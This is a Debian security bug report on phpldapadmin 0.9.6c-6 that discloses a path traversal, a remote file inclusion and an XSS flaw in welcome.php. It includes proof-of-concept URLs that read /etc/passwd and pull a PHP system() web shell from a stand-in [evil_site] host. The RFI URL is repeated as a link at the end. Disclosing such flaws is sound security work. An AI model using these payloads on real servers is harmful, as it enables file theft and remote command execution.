Package: phpldapadmin
Version: 0.9.6c-6
Severity: critical
Tags: security
Justification: root security hole
if unpatched and vulnerable, a user can see any file on target system,
poc:
http://[target]/[path]/phpldapadmin/welcome.php?custom_welcome_page=../../../../../../../../etc/passwd
a user can also execute arbitrary php code and system commands:
http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif
where cmd.gif is a file like this:
<?php system('[some_command]); ?>
also a user can craft a malicious url to include malicious client
side code that will be executed in the security contest of the
victim browser
original advisory: http://www.rgod.altervista.org/phpldap.html
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
![http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif](http://[target][path]/phpldapadmin/welcome.php?custom_welcome_page=http://[evil_site]/cmd.gif){kind=link}